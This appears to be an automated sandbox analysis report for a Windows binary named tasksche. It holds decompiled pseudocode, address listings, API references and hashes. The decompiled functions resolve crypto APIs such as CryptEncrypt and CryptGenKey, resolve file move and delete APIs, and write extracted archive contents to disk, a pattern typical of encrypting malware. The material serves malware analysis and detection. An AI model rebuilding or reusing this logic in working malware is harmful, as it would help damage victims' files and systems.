                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2382887404-3916222277
                                                                                • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                                                                                • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}









                                                                                0x004029ce
                                                                                0x004029d6
                                                                                0x004029db
                                                                                0x004029df
                                                                                0x004029ea
                                                                                0x004029ea
                                                                                0x004029ef
                                                                                0x00402a1d
                                                                                0x00402a1d
                                                                                0x00402a22
                                                                                0x00402a2e
                                                                                0x00402a31
                                                                                0x00000000
                                                                                0x004029f1
                                                                                0x004029f2
                                                                                0x004029f7
                                                                                0x00402a12
                                                                                0x00402a15
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004029f9
                                                                                0x004029f9
                                                                                0x004029fc
                                                                                0x00402a01
                                                                                0x00402a07
                                                                                0x00402a0b
                                                                                0x00402a0c
                                                                                0x00402a0d
                                                                                0x00000000
                                                                                0x004029f9
                                                                                0x004029ef
                                                                                0x00402a45

                                                                                APIs
                                                                                • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcessfree
                                                                                • String ID:
                                                                                • API String ID: 3428986607-0
                                                                                • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                                                • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}








                                                                                0x004018ba
                                                                                0x004018bc
                                                                                0x004018c1
                                                                                0x004018c4
                                                                                0x004018ca
                                                                                0x004018ca
                                                                                0x004018ce
                                                                                0x004018d3
                                                                                0x004018d6
                                                                                0x004018dc
                                                                                0x004018dc
                                                                                0x004018e0
                                                                                0x004018e5
                                                                                0x004018ea
                                                                                0x004018f0
                                                                                0x004018f0
                                                                                0x004018f6
                                                                                0x004018f8

                                                                                APIs
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ContextCryptRelease
                                                                                • String ID:
                                                                                • API String ID: 829835001-0
                                                                                • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                                                • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}













                                                                                0x00401713
                                                                                0x004017d8
                                                                                0x00000000
                                                                                0x004017d8
                                                                                0x0040171b
                                                                                0x00401721
                                                                                0x004017d3
                                                                                0x004017d5
                                                                                0x00000000
                                                                                0x004017d5
                                                                                0x00401732
                                                                                0x00401736
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401751
                                                                                0x0040175e
                                                                                0x0040176b
                                                                                0x00401778
                                                                                0x00401785
                                                                                0x00401792
                                                                                0x00401797
                                                                                0x00401799
                                                                                0x0040179f
                                                                                0x004017a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017a7
                                                                                0x004017ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017af
                                                                                0x004017b5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017b7
                                                                                0x004017bd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017bf
                                                                                0x004017c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017c7
                                                                                0x004017cd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                                                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                                                • API String ID: 2238633743-1294736154
                                                                                • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                                                • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}












                                                                                0x00401a48
                                                                                0x00401a4f
                                                                                0x00401aec
                                                                                0x00401aee
                                                                                0x00000000
                                                                                0x00401aee
                                                                                0x00401a60
                                                                                0x00401a64
                                                                                0x00401af1
                                                                                0x00000000
                                                                                0x00401af1
                                                                                0x00401a7f
                                                                                0x00401a8c
                                                                                0x00401a99
                                                                                0x00401aa6
                                                                                0x00401ab3
                                                                                0x00401ab8
                                                                                0x00401aba
                                                                                0x00401ac0
                                                                                0x00401ac6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401ac8
                                                                                0x00401ace
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401ad0
                                                                                0x00401ad6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401ad8
                                                                                0x00401ade
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401ae0
                                                                                0x00401ae6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                                                • API String ID: 2238633743-2459060434
                                                                                • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                                                • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}





































                                                                                0x00407136
                                                                                0x00407136
                                                                                0x00407140
                                                                                0x00407148
                                                                                0x0040714a
                                                                                0x00407168
                                                                                0x0040716b
                                                                                0x0040716e
                                                                                0x00407170
                                                                                0x004071b7
                                                                                0x004071c8
                                                                                0x004071cd
                                                                                0x004071cf
                                                                                0x004071d3
                                                                                0x004071d8
                                                                                0x004071d8
                                                                                0x004071d8
                                                                                0x004071dc
                                                                                0x004071dd
                                                                                0x004071e1
                                                                                0x004071ea
                                                                                0x004071ec
                                                                                0x004071fa
                                                                                0x00000000
                                                                                0x00407206
                                                                                0x00000000
                                                                                0x004071e3
                                                                                0x004071e3
                                                                                0x00000000
                                                                                0x004071e3
                                                                                0x004071e1
                                                                                0x00407172
                                                                                0x00407175
                                                                                0x00407179
                                                                                0x0040717e
                                                                                0x0040717e
                                                                                0x0040717f
                                                                                0x00407181
                                                                                0x00407185
                                                                                0x00407188
                                                                                0x0040715e
                                                                                0x00000000
                                                                                0x0040718a
                                                                                0x0040718a
                                                                                0x0040718d
                                                                                0x00407196
                                                                                0x00407196
                                                                                0x00407198
                                                                                0x0040719b
                                                                                0x004071ad
                                                                                0x004071b3
                                                                                0x004071b6
                                                                                0x00000000
                                                                                0x004071b6
                                                                                0x0040719e
                                                                                0x00407195
                                                                                0x00000000
                                                                                0x00407195
                                                                                0x00407190
                                                                                0x00000000
                                                                                0x00407190
                                                                                0x00407188
                                                                                0x0040714f
                                                                                0x00407210
                                                                                0x00407214
                                                                                0x00407218
                                                                                0x0040721d
                                                                                0x0040721d
                                                                                0x0040721e
                                                                                0x00407220
                                                                                0x00407223
                                                                                0x00407227
                                                                                0x0040722a
                                                                                0x00000000
                                                                                0x00407230
                                                                                0x00407230
                                                                                0x00407233
                                                                                0x0040723c
                                                                                0x0040723c
                                                                                0x0040723e
                                                                                0x00407241
                                                                                0x00407255
                                                                                0x0040725a
                                                                                0x00407261
                                                                                0x0040729c
                                                                                0x0040729f
                                                                                0x004072a9
                                                                                0x004072ac
                                                                                0x004072ae
                                                                                0x004072b0
                                                                                0x004072b2
                                                                                0x004072b2
                                                                                0x004072b4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004072b6
                                                                                0x004072b8
                                                                                0x004072be
                                                                                0x004072be
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c4
                                                                                0x00000000
                                                                                0x004072c4
                                                                                0x004072ba
                                                                                0x004072bc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004072bc
                                                                                0x004072cf
                                                                                0x004072d5
                                                                                0x004072d8
                                                                                0x00407347
                                                                                0x0040734f
                                                                                0x00407356
                                                                                0x0040737b
                                                                                0x0040738f
                                                                                0x0040739e
                                                                                0x004073a3
                                                                                0x00407312
                                                                                0x00407312
                                                                                0x0040732b
                                                                                0x00407331
                                                                                0x00407331
                                                                                0x00407334
                                                                                0x00407337
                                                                                0x004073b3
                                                                                0x004073b8
                                                                                0x004073c0
                                                                                0x004073c6
                                                                                0x004073c9
                                                                                0x004073ce
                                                                                0x004073cf
                                                                                0x004073cf
                                                                                0x004073d5
                                                                                0x004073d5
                                                                                0x004073d5
                                                                                0x004073d9
                                                                                0x004073eb
                                                                                0x004073ed
                                                                                0x004073f0
                                                                                0x004073f3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004073f5
                                                                                0x004073f7
                                                                                0x0040742a
                                                                                0x0040742a
                                                                                0x0040745a
                                                                                0x0040745a
                                                                                0x0040745e
                                                                                0x00407463
                                                                                0x00407463
                                                                                0x0040746b
                                                                                0x00000000
